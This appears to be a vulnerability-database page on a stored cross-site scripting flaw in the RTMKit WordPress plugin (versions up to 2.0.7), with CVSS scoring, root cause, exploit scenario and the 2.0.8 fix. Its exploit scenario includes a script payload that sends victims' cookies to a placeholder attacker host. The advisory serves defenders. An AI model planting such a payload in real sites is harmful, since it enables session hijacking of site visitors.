Severity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Stored XSS still requires a victim to navigate to the injected page (UI:R); PR:L reflects mandatory contributor account; S:C correct as payload executes in victim browser principal.
Primary rating from Vendor (Wordfence).
CVSS VectorVendor: Wordfence
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Lifecycle Timeline
2DescriptionCVE.org
The RTMKit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Advanced Heading widget's 'Background Text' parameter in versions up to, and including, 2.0.7 This is due to insufficient output escaping on the 'background_text_heading' setting in the render() function, which concatenates the value directly into an HTML attribute without applying esc_attr(). This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
AnalysisAI
Stored Cross-Site Scripting in RTMKit (rometheme-for-elementor) versions up to and including 2.0.7 allows authenticated contributors to persist arbitrary JavaScript in WordPress pages via the Advanced Heading widget's 'Background Text' field. The root cause is the direct concatenation of the user-controlled background_text_heading setting into an HTML attribute inside the widget's render() function without applying WordPress's esc_attr() sanitization, reported by Wordfence. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires a WordPress account with contributor-level access or higher (CVSS PR:L), which an attacker must possess or acquire before injection is possible - unauthenticated visitors cannot plant the payload. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The NVD-assigned CVSS 3.1 score of 6.4 (Medium) uses vector AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker obtains a contributor-level WordPress account on a target site running RTMKit ≤ 2.0.7 - either by registering on an open-registration site or by compromising existing credentials. They edit or create a page using the Advanced Heading Elementor widget and enter a JavaScript payload such as `"><script>document.location='https://attacker.example/steal?c='+document.cookie</script>` into the 'Background Text' field; this value is stored unsanitized in the database. … |
| Remediation | Update the RTMKit (rometheme-for-elementor) plugin to version 2.0.8 or later, which addresses the missing `esc_attr()` call in the Advanced Heading widget's `render()` function; the fix is evidenced by the trac changeset at https://plugins.trac.wordpress.org/changeset?old_path=%2Frometheme-for-elementor/tags/2.0.7&new_path=%2Frometheme-for-elementor/tags/2.0.8. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Unauthorized form submission disclosure in RTMKit (rometheme-for-elementor) versions up to and including 2.0.7 allows an
Local File Inclusion in the RTMKit (rometheme-for-elementor) plugin for WordPress versions up to and including 2.0.7 all
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-41512
GHSA-cvjh-fmg7-m8wm